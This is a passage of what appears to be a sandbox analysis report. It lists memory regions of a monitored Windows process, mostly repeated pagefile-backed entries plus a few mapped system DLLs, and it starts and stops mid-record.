end_va = 0x42d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 6486 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 6487 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6488 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6490 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6505 start_va = 0x4110000 end_va = 0x4269fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 6611 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 6656 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 6657 start_va = 0x1b0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 6658 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 6659 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6660 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6661 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6662 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6663 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6664 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6665 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6666 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6667 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6668 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6669 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6724 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6725 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6726 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6727 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6728 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6729 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6730 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6731 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6732 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6733 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6734 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6735 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6736 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6737 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6738 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6739 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6740 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6741 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6742 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6743 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6744 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6745 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6746 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6747 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6748 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6749 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6750 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6751 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6752 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6753 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6754 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6755 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6756 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6757 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6758 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6759 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6760 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6761 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6762 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6763 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6764 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6765 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6766 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6767 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6768 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6769 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6770 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6771 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6772 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6831 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6832 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6833 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6834 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6835 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6836 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6837 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6838 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6839 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6840 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6841 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6842 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6843 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6844 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6845 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6846 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6847 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6848 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6849 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6850 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6851 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6852 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6853 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6854 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6855 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6856 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6857 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6858 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6859 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6860 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6861 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6862 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6863 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6864 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6865 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6866 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6867 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6868 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6869 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6870 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6871 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6872 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6873 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6874 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6875 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6876 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6877 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6878 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6879 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6880 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6881 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6882 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6883 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6884 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6885 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6886 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6945 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6946 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6947 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6948 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6949 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6950 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6951 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6952 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6953 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6954 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6955 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6956 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6957 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6958 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6959 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6960 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6961 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6962 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6963 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6964 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6965 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6966 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6967 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6968 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6969 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6970 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6971 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6972 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6973 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6974 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6975 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6976 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6977 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6978 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6979 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6980 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6981 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6982 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6983 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6984 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6985 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6986 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6987 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6988 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6989 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6990 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 7037 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 7038 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 7039 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 7040 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 